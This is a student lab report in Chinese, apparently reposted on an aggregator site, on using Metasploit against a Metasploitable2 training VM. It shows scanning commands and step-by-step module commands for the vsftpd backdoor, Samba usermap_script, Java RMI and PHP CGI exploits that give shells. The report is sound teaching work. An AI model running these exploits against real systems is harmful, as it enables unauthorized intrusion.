20232308 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/17 17:34:16/文章来源:https://www.cnblogs.com/outlier/p/19233721

1.实验内容

1.1实验要求

掌握metasploit的用法

1.2实验内容

(1)发现Metasploitable2靶机,并对其进行端口扫描、漏洞扫描;
(2)利用Vsftpd源码包后门漏洞;
(3)利用SambaMS-RPC Shell命令注入漏洞;
(4)利用Java RMI SERVER命令执行漏洞;
(5)利用PHP CGI参数执行注入漏洞。

1.3本周学习内容

掌握了metasploit的使用过程以及原理

2.实验过程

前期准备,安装好靶机
image

2.1前期渗透

(1)主机发现
在Kali中依次输入如下命令。
msfconsole //进入msf控制台
search arp_sweep //搜寻arp_sweep功能模块
use 0 //在查询结果中使用第0项模块(也可以将0换成具体模块名字)
show options //查找该模块目前已填入的参数(同时可以看到需要填写的参数)
0c3c3541-cdb0-4a91-aba5-8349a9521127
5d64b110d5a48012eda3c14519e7e8f1
查询靶机IP地址,为192.168.78.147
eda8114f-ae52-4c91-a0dc-7157509c5bb1
再返回Kali输入如下命令。set RHOSTS 192.168.78.0/24 //设置目标主机IP地址
run //开始扫描
4ae2a70c-6ec8-4d29-83da-baef3b9e6969
可以看到成功的扫描到了靶机
(2)端口扫描
nmap -p 1-2318 192.168.78.147 //扫描靶机的1-2318端口,可以看到开放的端口
786dc52153ef1230a65cd4ef75f03e8a
可以看到靶机有很多端口都是处于open状态
(3)漏洞扫描
使用命令nmap -script=vuln 192.168.78.147对靶机进行漏洞扫描。
4e2e168da6f177280e68f6012463f53b
对扫描结果进行分析,发现靶机中存在相当多漏洞,也可以看到本次实验需要要用到的21、139、1099、80端口的开放信息以及漏洞信息。
4e2e168da6f177280e68f6012463f53b
522e02a8-4377-4a87-ac1f-56a1c05770e7
72b7c722-0eb1-47d7-9393-7556dfc29ac3
通过询问ai我知道对于25端口的SMTP服务存在匿名Diffie-Hellman密钥交换漏洞和DHE_EXPORT降级漏洞。Diffie-Hellman密钥交换漏洞会导致中间人攻击,破坏通信的机密性和完整性。
对于80端口的HTTP服务存在敏感目录与文件暴露风险,Slowloris DoS漏洞和跨站请求伪造漏洞
对于1099端口的远程方法调用服务也存在漏洞,RMI注册表的默认配置允许从远程URL加载类,可导致远程代码执行。

2.2Vsftpd源码包后门漏洞(21端口)

通过学习相关知识点我知道,该漏洞的原理是在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
进入msf控制台,输入如下命令:
use exploit/unix/ftp/vsftpd_234_backdoor //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
1a94d784-16dc-4403-af14-0438ea53ede1
再利用uname –a、pwd、id、ifconfig等命令进行验证是否攻击成功
d12a2872-5a22-4b1f-9d17-b497c36d1469
可以看到我们现在已经成功的获取了靶机shell,攻击成功

2.3SambaMS-RPC Shell命令注入漏洞(端口139)

通过学习相关知识点我知道,该漏洞的原理是amba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
输入命令
use exploit/multi/samba/usermap_script //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
4516e5ca-e354-4864-ac95-8a91fba0f8e3
再利用ifconfig命令进行验证是否攻击成功,可以看到攻击成功了。
d5458f67063fc0e8a1d8f778424149fc

2.4Java RMI SERVER命令执行漏洞(1099端口)

通过学习相关知识点我知道,该漏洞的原理是Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
输入命令
use exploit/multi/misc/java_rmi_server //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
ifconfig //验证攻击是否成功
可以看到成功获得了靶机的shell,攻击成功
cbb613252f17e3898761bf6c3348e2e0
image

2.5PHP CGI参数执行注入漏洞(80端口)

通过学习相关知识点我知道,该漏洞的原理是CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
输入命令
use exploit/multi/http/php_cgi_arg_injection //选择漏洞
set RHOST 192.168.78.147 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
shell //尝试打开靶机shell
d7f42278ed85dbb14b60552febaa0f1c
可以看到成功获得了靶机的shell,攻击成功

3.问题及解决方案

  • 问题1:在靶机使用ifconfig没有IP地址显示
  • 问题1解决方案:通过查询相关教程,将连接方式改为桥接,解决了问题
    image

4.学习感悟、思考等

通过本次实验,我学习了Metasploit攻击渗透实践,对Metasploit的流程以及原理都有了更深刻的理解,对主机发现、端口扫描与漏洞扫描的掌握也更加清晰
整体上来说我认为这次实验的难度不大,只有在安装靶机的时候浪费的时间比较多,后面的测试部分的整体思路类似,但是仍需要辨析每一种测试方式的原理

参考资料

  • Metasploit安装

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/968148.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

directory linux

当然可以!在 Linux 系统中,目录(directory)是文件系统中的一个组织结构单位,用于存储文件。以下是一些与目录相关的常见 Linux 命令和 Shell 脚本示例,帮助你更好地管理目录:一、常见目录相关命令 1. ls 命令 用…

deepin linux 安装

Deepin 是一个基于 Linux 的桌面操作系统,它基于 Debian/Ubuntu 构建,提供了丰富的桌面体验和良好的兼容性。如果你是在使用 Deepin Linux 的环境下进行安装或配置,以下是一些常见操作的 Linux 命令和 Shell 脚本示…

dbca linux

dbca 是 Oracle Database Configuration Assistant 的缩写,用于在 Linux 系统上安装、配置和管理 Oracle 数据库。它是一个命令行工具,用于执行数据库的安装、配置、启动、停止、备份、恢复等操作。 基本用法: dbca…

智慧建筑工地传感器参数一览表

重力传感器 卸扣式重力传感器 "量程0~3T,RS485输出(红﹢黑﹣绿A白B,modbus协议,5~12VDC供电(推荐10VDC),零点输出:≤1%F.S;灵敏度:1.0~2.0mV/V;非线性:≤0.5%F.S;滞后:≤+0.5%F.S;重复性:≤+0.5%…

2025靠谱留学机构推荐TOP5!美国/英国/澳洲多国申请,高录取率机构榜单

2025靠谱留学机构推荐TOP5!美国/英国/澳洲多国申请,高录取率机构榜单随着全球化教育的深入发展,留学申请需求持续攀升,优质的留学机构能为学生提供从选校规划到就业赋能的全链条支持,有效提升申请成功率与未来发展…

04-import 和 export

04-import 和 export$(".postTitle2").removeClass("postTitle2").addClass("singleposttitle");一个是导出,一个是导入 就是将组件导出和导入 导出的用法export 方式一:注意:导出和…

藜民百信消费帮扶平台:牵手 832 平台获殊荣,让兴和县农产品出圈、农户腰包鼓

在全国消费帮扶浪潮中,832 平台是连接贫困地区农产品与全国采购市场的重要枢纽。2015 年成立于内蒙古乌兰察布市兴和县的藜民百信,精心打造专属消费帮扶平台,通过深度牵手 832 平台,不仅斩获 “助农增收优秀供应商…

Ollama 部署 Qwen3:0.6B 模型操作记录

1. 安装前准备 系统要求操作系统: Windows 10/11, macOS 或 Linux 硬件要求:CPU: 至少4核处理器 内存: 8GB 或更高(推荐16GB) 存储: 至少有5GB可用空间 GPU: 可选(NVIDIA显卡推荐使用CUDA驱动)网络要求稳定的互联网…

LiveGBS GB28181监控视频平台中如何配置文字文印或图片水印,将水印叠加到播放器或视频内容中

监控视频通过GB28181协议接入到LiveGBS流媒体平台后,如果有加上特殊水印的需求,可以在通道配置里面自行配置。 LiveGBS国标GB28181平台既支持在前端播放窗口叠加水印,又支持服务器后台水印叠加到视频内容中。 1、前…

Linux 项目部署

安装docker后,拉取mysql及jdk镜像docker pull mysql:latest docker pull eclipse-temurin:8-jdk

curtime在MySQL触发器中的使用方法

在MySQL中,CURTIME()函数返回当前日期和时间。在触发器中使用CURTIME()函数可以帮助您在插入或更新记录时自动填充当前时间戳。以下是如何在MySQL触发器中使用CURTIME()函数的示例:创建一个名为my_table的表,其中包…

Frida Hook Android手册

Frida Hook Android手册Frida Hook Android手册 write by ppl on 2025/4 Frida的安装与配置 ​ 网上教程一大堆,略 连接 Android 设备 运行Frida服务端 $> adb shell su cd /data/local/tmp ./frida-server进行…

curtime与now函数在MySQL中的区别

CURTIME() 和 NOW() 是 MySQL 中两个常用的日期和时间函数,它们的主要区别在于返回的结果类型和用途。返回结果类型:CURTIME() 函数返回的是时间类型(TIME),格式为 ‘HH:MM:SS’。它只包含一天中的小时、分钟和秒…

Trick 总结

几何最小圆覆盖 \(\to\) 加点,圆半径由两或三个点决定。乱搞由先前答案剪枝,随机打乱枚举顺序大致只有 \(O(\log n)\) 次更新。

2025年最新出炉:车载电源十大品牌性能排行榜,光伏电源/氢能源车载直流转换器/新能源车载直流转换器/高功率密度电源/军用电源产品排行

行业分析:车载电源市场格局与技术创新趋势 随着新能源汽车产业的蓬勃发展,车载电源作为核心零部件的重要性日益凸显。根据最新市场调研数据显示,2025年全球车载电源市场规模预计突破千亿元,技术创新与产品质量成为…

成都恒利泰PIN-to-PIN 国产版 HT-LFCW-5500+

成都恒利泰PIN-to-PIN 国产版 HT-LFCW-5500+1、替代产品型号Mini-Circuits LFCW-5500+ 成都恒利泰出了 PIN-to-PIN 国产版 HT-LFCW-5500+, DC-5.5 GHz,LTCC-4Pin,2.01.25 mm。 抱着“小白鼠”心态申请了两片,今天把…

身份认证状态的存储与传递( Spring Boot篇 )

Spring Boot 登录信息获取机制摘要 Spring Boot 中浏览器获取登录信息的核心是通过身份凭证的存储与验证实现的,主要包括两种主流方案: Session+Cookie方案(经典方式) 服务端创建Session存储用户信息,生成唯一JSE…

国标GB28181算法算力平台EasyGBS打造园区智能化安防监控高效解决方案

一、方案背景 随着城市化进程的加速和企业规模的不断扩大,园区的安防需求变得日益复杂。传统安防监控系统在面对大规模、多区域、多设备的监控需求时,常常面临设备兼容性差、监控效率低、数据管理复杂等问题。为解决…

20232306 2025-2026-1 《网络与系统攻防技术》实验六实验报告

实验内容及要求 本实践目标是掌握metasploit的用法。 指导书参考Rapid7官网的指导教程。 https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 下载官方靶机Metasploitable2,完成下面实验内容…

数据库基础(lab5:单表查询 三)

lab5:单表查询(三) 一、对查询结果排序 (ORDER BY) ORDER BY 子句用于对 SELECT 语句返回的结果集进行排序。基本语法作用: 根据一个或多个列对结果进行升序或降序排序。 语法: ORDER BY 字段名 [ASC | DESC];ASC: …